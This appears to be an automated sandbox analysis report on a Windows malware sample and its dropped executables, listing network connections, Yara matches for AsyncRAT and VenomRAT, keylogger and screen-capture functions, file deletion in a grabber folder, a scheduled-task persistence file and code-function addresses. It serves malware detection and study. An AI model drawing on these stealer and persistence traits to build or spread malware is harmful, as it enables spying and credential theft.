Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49959 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.4:50161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50280 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: n4e23hz.exe PID: 5724, type: MEMORYSTR

Contains functionality to capture screen (.Net source)

Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, DesktopScreenshot.cs

.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File deleted: C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.png
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File deleted: C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.png
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File deleted: C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File deleted: C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.docx
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	File deleted: C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\YPSIACHYXW.png

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.3.n4e23hz.exe.6f623b8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 13.3.n4e23hz.exe.6f623b8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: f1628a2a52.exe, 00000013.00000002.2854638887.0000000000A42000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_0f7f91ac-c
Source: f1628a2a52.exe, 00000013.00000002.2854638887.0000000000A42000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_8069a323-0

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name:
Source: CAFIJKFHIJ.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: c20459f2e6.exe.12.dr	Static PE information: section name:
Source: c20459f2e6.exe.12.dr	Static PE information: section name: .idata
Source: c20459f2e6.exe.12.dr	Static PE information: section name:
Source: n4e23hz[1].exe.12.dr	Static PE information: section name:
Source: n4e23hz[1].exe.12.dr	Static PE information: section name: .idata
Source: n4e23hz[1].exe.12.dr	Static PE information: section name:
Source: n4e23hz.exe.12.dr	Static PE information: section name:
Source: n4e23hz.exe.12.dr	Static PE information: section name: .idata
Source: n4e23hz.exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name:
Source: random[1].exe.12.dr	Static PE information: section name: .idata
Source: random[1].exe.12.dr	Static PE information: section name:
Source: b24ae367e7.exe.12.dr	Static PE information: section name:
Source: b24ae367e7.exe.12.dr	Static PE information: section name: .idata
Source: b24ae367e7.exe.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: random[1].exe0.12.dr	Static PE information: section name: .idata
Source: random[1].exe0.12.dr	Static PE information: section name:
Source: d985563cac.exe.12.dr	Static PE information: section name:
Source: d985563cac.exe.12.dr	Static PE information: section name: .idata
Source: d985563cac.exe.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: .idata
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: 25045de666.exe.12.dr	Static PE information: section name:
Source: 25045de666.exe.12.dr	Static PE information: section name: .idata
Source: 25045de666.exe.12.dr	Static PE information: section name:
Source: random[2].exe.12.dr	Static PE information: section name:
Source: random[2].exe.12.dr	Static PE information: section name: .idata
Source: 1124f3753f.exe.12.dr	Static PE information: section name:
Source: 1124f3753f.exe.12.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

0_2_6C6B62C0

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53AC60	0_2_6C53AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60AC30	0_2_6C60AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6C00	0_2_6C5F6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58ECD0	0_2_6C58ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C52ECC0	0_2_6C52ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FED70	0_2_6C5FED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65AD50	0_2_6C65AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B8D20	0_2_6C6B8D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BCDC0	0_2_6C6BCDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6D90	0_2_6C5C6D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C534DB0	0_2_6C534DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CEE70	0_2_6C5CEE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C610E20	0_2_6C610E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53AEC0	0_2_6C53AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D0EC0	0_2_6C5D0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B6E90	0_2_6C5B6E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59EF40	0_2_6C59EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F2F70	0_2_6C5F2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C536F10	0_2_6C536F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670F20	0_2_6C670F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60EFF0	0_2_6C60EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C530FE0	0_2_6C530FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678FB0	0_2_6C678FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53EFB0	0_2_6C53EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C604840	0_2_6C604840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C580820	0_2_6C580820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA820	0_2_6C5BA820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6368E0	0_2_6C6368E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C568960	0_2_6C568960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C586900	0_2_6C586900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C9E0	0_2_6C64C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5649F0	0_2_6C5649F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F09B0	0_2_6C5F09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C09A0	0_2_6C5C09A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA9A0	0_2_6C5EA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ACA70	0_2_6C5ACA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DEA00	0_2_6C5DEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E8A30	0_2_6C5E8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AEA80	0_2_6C5AEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C636BE0	0_2_6C636BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D0BA0	0_2_6C5D0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C548460	0_2_6C548460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA430	0_2_6C5BA430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C594420	0_2_6C594420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5764D0	0_2_6C5764D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CA4D0	0_2_6C5CA4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65A480	0_2_6C65A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C588540	0_2_6C588540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C634540	0_2_6C634540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D0570	0_2_6C5D0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678550	0_2_6C678550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C592560	0_2_6C592560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BE5F0	0_2_6C5BE5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FA5E0	0_2_6C5FA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5245B0	0_2_6C5245B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58C650	0_2_6C58C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5546D0	0_2_6C5546D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58E6E0	0_2_6C58E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE6E0	0_2_6C5CE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B0700	0_2_6C5B0700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55A7D0	0_2_6C55A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57E070	0_2_6C57E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F8010	0_2_6C5F8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FC000	0_2_6C5FC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C528090	0_2_6C528090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60C0B0	0_2_6C60C0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5400B0	0_2_6C5400B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C598140	0_2_6C598140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C614130	0_2_6C614130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A6130	0_2_6C5A6130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5301E0	0_2_6C5301E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8250	0_2_6C5C8250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B8260	0_2_6C5B8260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C608220	0_2_6C608220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FA210	0_2_6C5FA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B62C0	0_2_6C6B62C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6022A0	0_2_6C6022A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FE2B0	0_2_6C5FE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C360	0_2_6C64C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C538340	0_2_6C538340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C672370	0_2_6C672370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C532370	0_2_6C532370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6370	0_2_6C5C6370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A2320	0_2_6C5A2320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5843E0	0_2_6C5843E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58E3B0	0_2_6C58E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5623A0	0_2_6C5623A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C533C40	0_2_6C533C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C659C40	0_2_6C659C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C541C30	0_2_6C541C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66DCD0	0_2_6C66DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F1CE0	0_2_6C5F1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CFC80	0_2_6C5CFC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C593D00	0_2_6C593D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C601DC0	0_2_6C601DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C523D80	0_2_6C523D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679D90	0_2_6C679D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B5E60	0_2_6C6B5E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68BE70	0_2_6C68BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63DE10	0_2_6C63DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C553EC0	0_2_6C553EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687F20	0_2_6C687F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C525F30	0_2_6C525F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C565F20	0_2_6C565F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64DFC0	0_2_6C64DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B3FC0	0_2_6C6B3FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DBFF0	0_2_6C5DBFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C551F90	0_2_6C551F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C603840	0_2_6C603840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58D810	0_2_6C58D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60F8F0	0_2_6C60F8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B8F0	0_2_6C68B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CF8C0	0_2_6C5CF8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53D8E0	0_2_6C53D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5638E0	0_2_6C5638E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AF960	0_2_6C5AF960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED960	0_2_6C5ED960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F900	0_2_6C67F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E5920	0_2_6C5E5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5699D0	0_2_6C5699D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C99C0	0_2_6C5C99C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5959F0	0_2_6C5959F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C79F0	0_2_6C5C79F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C541980	0_2_6C541980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C601990	0_2_6C601990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9A50	0_2_6C6B9A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C56FA10	0_2_6C56FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D1A10	0_2_6C5D1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62DA30	0_2_6C62DA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C531AE0	0_2_6C531AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60DAB0	0_2_6C60DAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60FB60	0_2_6C60FB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57BB20	0_2_6C57BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C577BF0	0_2_6C577BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C521B80	0_2_6C521B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F9BB0	0_2_6C5F9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C615B90	0_2_6C615B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C589BA0	0_2_6C589BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BD410	0_2_6C5BD410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C619430	0_2_6C619430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5314E0	0_2_6C5314E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B14A0	0_2_6C6B14A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C545510	0_2_6C545510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C597500	0_2_6C597500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67F510	0_2_6C67F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B55F0	0_2_6C5B55F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C569590	0_2_6C569590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C549650	0_2_6C549650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C585640	0_2_6C585640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A7610	0_2_6C5A7610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C559600	0_2_6C559600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5616A0	0_2_6C5616A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5996A0	0_2_6C5996A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609720	0_2_6C609720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59D710	0_2_6C59D710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C553720	0_2_6C553720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6737C0	0_2_6C6737C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BB7A0	0_2_6C5BB7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C52D050	0_2_6C52D050
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_00308860	9_2_00308860
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_00307049	9_2_00307049
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_003078BB	9_2_003078BB
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_003031A8	9_2_003031A8
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002C4B30	9_2_002C4B30
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_00302D10	9_2_00302D10
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002C4DE0	9_2_002C4DE0
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002F7F36	9_2_002F7F36
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_0030779B	9_2_0030779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00547049	10_2_00547049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00548860	10_2_00548860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_005478BB	10_2_005478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_005431A8	10_2_005431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00504B30	10_2_00504B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00542D10	10_2_00542D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00504DE0	10_2_00504DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_00537F36	10_2_00537F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0054779B	10_2_0054779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00547049	11_2_00547049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00548860	11_2_00548860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_005478BB	11_2_005478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_005431A8	11_2_005431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00504B30	11_2_00504B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00542D10	11_2_00542D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00504DE0	11_2_00504DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00537F36	11_2_00537F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_0054779B	11_2_0054779B

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: String function: 002D80C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6BDAE0 appears 85 times
